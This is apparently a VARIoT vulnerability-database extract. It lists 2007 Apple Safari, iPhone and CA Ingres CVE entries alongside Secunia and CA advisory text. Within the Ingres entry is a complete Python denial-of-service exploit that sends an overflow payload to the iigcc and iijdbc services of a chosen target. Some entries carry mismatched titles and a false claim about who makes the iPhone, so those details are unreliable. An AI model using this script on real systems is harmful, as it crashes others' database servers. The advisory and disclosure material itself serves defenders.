VARIoT IoT vulnerabilities database

VAR-200709-0211 | CVE-2007-4812 | Apple Safari for Windows Document.Location.Hash Buffer Overflow Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Buffer overflow in Apple Safari 3.0.3 522.15.5, and other versions before Beta Update 3.0.4, allows remote attackers to cause a denial of service (crash) and possibly have other unspecified impact by setting document.location.hash to a long string. NOTE: the crash might actually occur in the alert method. Apple Safari In document.location.hash Contains a flaw in string handling that could lead to a buffer overflow.Created by a third party Web Browsing the browser by browsing the page causes service disruption (DoS) Could be put into a state or execute arbitrary code. Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions
VAR-200706-0568 | CVE-2007-3376 | Apple Safari Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in Apple Safari 3.0.2 on Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long value in the title HTML tag, which triggers the overflow when the user adds the page as a bookmark. Safari for Windows is prone to a buffer-overflow vulnerability. This issue is triggered when an attacker entices a victim to bookmark a maliciously crafted site.
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Overflow is triggered when a user adds a web page to favorites
VAR-200708-0454 | CVE-2007-3743 | Apple Safari Vulnerable to stack-based buffer overflow in bookmark processing |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Stack-based buffer overflow in bookmark handling in Apple Safari 3 Beta before Update 3.0.3 on Windows allows user-assisted remote attackers to cause a denial of service (application crash) or execute arbitrary code via a bookmark with a long title. Safari for Windows is prone to a buffer-overflow vulnerability. This issue is triggered when an attacker entices a victim to bookmark a maliciously crafted site.
A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. Safari is the WEB browser bundled with the Apple family operating system by default. When Safari 3 Beta for Windows is upgraded to version 3.0.3, there is a buffer overflow vulnerability when dealing with super long titles in web pages. Remote attackers may take advantage of this vulnerability to control the user's machine. Safari on Windows does not properly handle title fields in web pages. If the length of this field is greater than 1024 bytes, a buffer overflow will be triggered when the user visits the page and performs the bookmark operation, resulting in the execution of arbitrary instructions in the browser session
VAR-200708-0453 | CVE-2007-3742 | Apple Safari cross-domain HTTP redirection race condition |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, does not properly handle the interaction between International Domain Name (IDN) support and Unicode fonts, which allows remote attackers to create a URL containing "look-alike characters" (homographs) and possibly perform phishing attacks. Apple Safari contains a race condition when handling HTTP redirection when updating pages. This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. Apple's Safari contains a vulnerability that allows spoofing of URLs in the address bar. Apple's Safari is a web browser installed as default with Mac OS X. There is a problem in Safari where URLs displayed in the address bar could be spoofed to deceive Safari users. This could be conducted by using Unicode characters that look alike to ASCII characters as URL strings.As it is difficult for Safari users to tell whether the displayed URL is spoofed or not, an attacker could possibly conduct phising attacks.
Attackers may exploit this vulnerability via a malicious webpage to spoof the contents and origin of a page that the victim may trust. Attackers may find this issue useful in phishing or other attacks that rely on content spoofing.
This issue affects Apple Safari 3.0.2 for Windows; other versions may also be affected.
The iPhone is reported to be affected in the APPLE-SA-2007-07-31 iPhone v1.0.1 Update security advisory.
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date.
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors.
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system.
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page.
Successful exploitation may allow execution of arbitrary code.
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests.
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code.
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc.
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators.
3) The vendor credits Richard Moore, Westpoint Ltd.
5) The vendor credits Rhys Kidd, Westnet.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200707-0129 | CVE-2007-3944 | Apple Safari cross-domain HTTP redirection race condition |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple heap-based buffer overflows in the Perl Compatible Regular Expressions (PCRE) library in the JavaScript engine in WebKit in Apple Safari 3 Beta before Update 3.0.3, and iPhone before 1.0.1, allow remote attackers to execute arbitrary code via certain JavaScript regular expressions. NOTE: this issue was originally reported only for MobileSafari on the iPhone. NOTE: it is not clear whether this stems from an issue in the original distribution of PCRE, which might already have a separate CVE identifier. Apple Safari contains a race condition when handling HTTP redirection when updating pages. This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code.
The researchers responsible for discovering this issue have developed exploit code that can steal sensitive information from a vulnerable device and send it to a remote server. Another proof of concept that exploits the same issue can be used to perform physical actions on the phone such as making a sound or setting the phone to vibrate. The researchers have not yet disclosed the complete details of this vulnerability but will do so as part of a presentation for the BlackHat security conference on August 2, 2007.
This issue also affects Safari on other platforms including Windows and Mac OS X. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. Remote attackers may use this vulnerability to control the user system by enticing users to visit malicious web pages.
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date.
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors.
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests.
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters.
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code.
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc.
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators.
3) The vendor credits Richard Moore, Westpoint Ltd.
5) The vendor credits Rhys Kidd, Westnet.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200706-0349 | CVE-2007-2401 | Apple Safari cross-domain HTTP redirection race condition |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
CRLF injection vulnerability in WebCore in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1, allows remote attackers to inject arbitrary HTTP headers via LF characters in an XMLHttpRequest request, which are not filtered when serializing headers via the setRequestHeader function. NOTE: this issue can be leveraged for cross-site scripting (XSS) attacks. Apple Safari contains a race condition when handling HTTP redirection when updating pages. This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. Apple WebCore is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may exploit this issue by enticing victims into visiting a malicious website. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2401 XMLHttpRequest of the WebCore software package has a vulnerability in processing HTTP request headers, resulting in cross-site scripting.
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date.
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors.
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system.
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page.
Successful exploitation may allow execution of arbitrary code.
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests.
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters.
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code.
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc.
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators.
3) The vendor credits Richard Moore, Westpoint Ltd.
5) The vendor credits Rhys Kidd, Westnet.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200706-0348 | CVE-2007-2400 | Apple Safari cross-domain HTTP redirection race condition |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Race condition in Apple Safari 3 Beta before 3.0.2 on Mac OS X, Windows XP, Windows Vista, and iPhone before 1.0.1, allows remote attackers to bypass the JavaScript security model and modify pages outside of the security domain and conduct cross-site scripting (XSS) attacks via vectors related to page updating and HTTP redirects. Apple Safari contains a race condition when handling HTTP redirection when updating pages. This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation. The Apple Webkit contains a memory corruption vulnerability.This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code.
Exploiting this issue may allow attackers to access locations that a user visits, even if those locations are in a different domain than the attacker's site. The most common manifestation of this condition would typically be in blogs or forums. Attackers may be able to access potentially sensitive information that would aid in phishing attacks.
This issue affects versions prior to Safari 3 Beta Update 3.0.2. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2400 There is a vulnerability in the implementation of Safari's processing of JavsScript. Remote attackers may use this vulnerability to bypass the same-origin policy and operate other web pages without authorization.
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date.
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors.
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system.
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page.
Successful exploitation may allow execution of arbitrary code.
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests.
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters.
5) An invalid type conversion when rendering frame sets may allow
execution of arbitrary code.
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc.
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators.
3) The vendor credits Richard Moore, Westpoint Ltd.
5) The vendor credits Rhys Kidd, Westnet.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200706-0347 | CVE-2007-2399 | Apple Safari cross-domain HTTP redirection race condition |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1 performs an "invalid type conversion", which allows remote attackers to execute arbitrary code via unspecified frame sets that trigger memory corruption. Apple Safari contains a race condition when handling HTTP redirection when updating pages. This can allow a cross-domain violation. Apple WebCore fails to properly serialize headers into an HTTP request, which can cause a cross-domain security violation.
An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document. The iPhone is a smartphone developed by Capsule Corporation. There are multiple security holes in the implementation of the iPhone, which can lead to malicious operation of the browser or information leakage. The specific vulnerability entries are as follows: * CVE-2007-2399 WebKit software package has a vulnerability in processing invalid type conversion when generating web pages.
----------------------------------------------------------------------
BETA test the new Secunia Personal Software Inspector!
The Secunia PSI detects installed software on your computer and
categorises it as either Insecure, End-of-Life, or Up-To-Date.
Effectively enabling you to focus your attention on software
installations where more secure versions are available from the
vendors.
Download the free PSI BETA from the Secunia website:
https://psi.secunia.com/
----------------------------------------------------------------------
TITLE:
Apple iPhone Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA26287
VERIFY ADVISORY:
http://secunia.com/advisories/26287/
CRITICAL:
Highly critical
IMPACT:
Cross Site Scripting, Spoofing, DoS, System access
WHERE:
>From remote
OPERATING SYSTEM:
Apple iPhone 1.x
http://secunia.com/product/15128/
DESCRIPTION:
Some vulnerabilities have been reported in Apple iPhone, which can be
exploited by malicious people to conduct cross-site scripting and
spoofing attacks, and potentially to compromise a vulnerable system.
2) A boundary error in the Perl Compatible Regular Expressions (PCRE)
library used by the Javascript engine in Safari can be exploited to
cause a heap-based buffer overflow when a user visits a malicious web
page.
3) An HTTP injection issue in XMLHttpRequest can be exploited to
inject arbitrary HTTP requests.
For more information see vulnerability #2 in:
SA25786
4) An error in WebKit within in the handling of International Domain
Name (IDN) support and Unicode fonts embedded in Safari can be
exploited to spoof a URL by registering domain names with certain
international characters that resembles other commonly used
characters.
For more information see vulnerability #1 in:
SA25786
SOLUTION:
Update to version 1.0.1 (downloadable and installable via iTunes).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Lawrence Lai, Stan Switzer, and Ed Rowe of
Adobe Systems, Inc.
2) The vendor credits Charlie Miller and Jake Honoroff of Independent
Security Evaluators.
3) The vendor credits Richard Moore, Westpoint Ltd.
5) The vendor credits Rhys Kidd, Westnet.
ORIGINAL ADVISORY:
http://docs.info.apple.com/article.html?artnum=306173
OTHER REFERENCES:
SA25786:
http://secunia.com/advisories/25786/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200706-0398 | CVE-2007-3337 |
CA Used in products Ingres database server Vulnerable to arbitrary file truncation
Related entries in the VARIoT exploits database: VAR-E-200706-0107 |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
wakeup in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allows local users to truncate arbitrary files via a symlink attack on the alarmwkp.def file. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
Impact: Attackers can potentially execute arbitrary code, or
overwrite files.
Summary: Various CA products that embed Ingres products contain
multiple vulnerabilities that can allow an attacker to potentially
execute arbitrary code. CA has issued fixes, to address all of
these vulnerabilities, for all supported CA products that may be
affected.
1) Ingres controllable pointer overwrite vulnerability (reported
by NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can potentially execute
arbitrary code within the context of the database server.
2) Ingres remote unauthenticated pointer overwrite #2 (reported by
NGSSoftware) [Ingres bug 115927, CVE-2007-3336, CAID 35450]
Description: An unauthenticated attacker can exploit a pointer
overwrite vulnerability to execute arbitrary code within the
context of the database server.
3) Ingres wakeup file overwrite (reported by NGSSoftware)
[Ingres bug 115913, CVE-2007-3337, CAID 35451]
Description: The "wakeup" binary creates a file named
"alarmwkp.def" in the current directory, truncating the file if it
already exists. The "wakeup" binary is setuid "ingres" and
world-executable. Consequently, an attacker can truncate a file
with the privileges of the "ingres" user.
4) Ingres uuid_from_char stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: An attacker can pass a long string as an argument to
uuid_from_char() to cause a stack buffer overflow and the saved
returned address can be overwritten.
5) Ingres verifydb local stack overflow (reported by NGSSoftware)
[Ingres bug 115911, CVE-2007-3338, CAID 35452]
Description: A local attacker can exploit a stack overflow in the
Ingres verifydb utility duve_get_args function.
6) Communication server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the communications server (iigcc.exe). This only
affects Ingres on the Windows operating system. Reported by
iDefense as IDEF2023.
7) Data Access/JDBC server heap corruption (reported by iDefense)
[Ingres bug 117523, CVE-2007-3334, CAID 35453]
Description: An attacker can execute arbitrary code within the
context of the Data Access server (iigcd.exe) in r3 or the JDCB
server in older releases. This only affects Ingres on the Windows
operating system. Reported by iDefense as IDEF2022.
Mitigating Factors: None
Severity: CA has given these vulnerabilities a cumulative High
risk rating.
Affected Products:
Advantage Data Transformer r2.2
AllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1
AllFusion Harvest Change Manager r7, r7.1
BrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix,
Linux and Mainframe Linux)
BrightStor ARCserve Backup for Laptops and Desktops r11.5
BrightStor Enterprise Backup (Unix only) r10.5
BrightStor Storage Command Center r11.5
BrightStor Storage Resource Manager r11.5
CleverPath Aion Business Rules Expert r10.1
CleverPath Aion Business Process Monitoring r10.1
CleverPath Predictive Analysis Server r3
DocServer 1.1
eTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2
eTrust Audit r8 SP2
eTrust Directory r8.1
eTrust IAM Suite r8.0
eTrust IAM Toolkit r8.0, r8.1
eTrust Identity Manager r8.1
eTrust Network Forensics r8.1
eTrust Secure Content Manager r8
eTrust Single Sign-On r7, r8, r8.1
eTrust Web Access Control 1.0
Unicenter Advanced Systems Management r11
Unicenter Asset Intelligence r11
Unicenter Asset Management r11
Unicenter Asset Portfolio Management r11.2.1, r11.3
Unicenter CCS r11
Unicenter Database Command Center r11.1
Unicenter Desktop and Server Management r11
Unicenter Desktop Management Suite r11
Unicenter Enterprise Job Manager r1 SP3, r1 SP4
Unicenter Job Management Option r11
Unicenter Lightweight Portal 2
Unicenter Management Portal r3.1.1
Unicenter Network and Systems Management r3.0, r11
Unicenter Network and Systems Management - Tiered - Multi Platform
r3.0 0305, r3.1 0403, r11.0
Unicenter Patch Management r11
Unicenter Remote Control 6, r11
Unicenter Service Accounting r11, r11.1
Unicenter Service Assure r2.2, r11, r11.1
Unicenter Service Catalog r11, r11.1
Unicenter Service Delivery r11.0, r11.1
Unicenter Service Intelligence r11
Unicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1
Unicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11,
r11.1, r11.2
Unicenter Software Delivery r11
Unicenter TNG 2.4, 2.4.2, 2.4.2J
Unicenter Workload Control Center r1 SP3, r1 SP4
Unicenter Web Services Distributed Management 3.11, 3.50
Wily SOA Manager 7.1
Affected Platforms:
All operating system platforms supported by the various CA
products that embed Ingres. This includes Windows, Linux, and
supported UNIX platforms.
Status and Recommendation:
CA recommends that customers apply the appropriate fix(es) listed
on the Security Notice page:
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
Workaround: None
References (URLs may wrap):
CA SupportConnect:
http://supportconnect.ca.com/
CA SupportConnect Security Notice for these vulnerabilities:
Ingres Security Alert
http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp
Important Security Notice for Customers Using Products That Embed
Ingres
http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp
CA Security Advisor posting:
CA Products That Embed Ingres Multiple Vulnerabilities
http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452
http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453
Ingres knowledge base document:
http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl
Reported By: NGSSoftware, and iDefense
NGSSoftware Advisory:
http://www.ngssoftware.com/research/advisories/
iDefense Advisory:
Ingres Database Multiple Heap Corruption Vulnerabilities
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546
CVE References:
CVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334
OSVDB References: Pending
http://osvdb.org/
Changelog for this advisory:
v1.0 - Initial Release
Customers who require additional information should contact CA
Technical Support at http://supportconnect.ca.com.
For technical questions or comments related to this advisory,
please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a
Vulnerability" form.
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx
Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>
import socket
import sys
if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]
if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)
payload += "\x42" * 4
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)
print service + " crashed"
VAR-200706-0399 | CVE-2007-3338 |
plural CA Product Ingres database server Vulnerable to stack-based buffer overflow
Related entries in the VARIoT exploits database: VAR-E-200706-0107 |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (Computer Associates) products, allow remote attackers to execute arbitrary code via the (1) uuid_from_char or (2) duve_get_args functions.
Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.
Title: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed
Ingres Multiple Vulnerabilities
CA Vuln ID (CAID): 35450, 35451, 35452, 35453
CA Advisory Date: 2007-06-21
Reported By: NGSSoftware, and iDefense
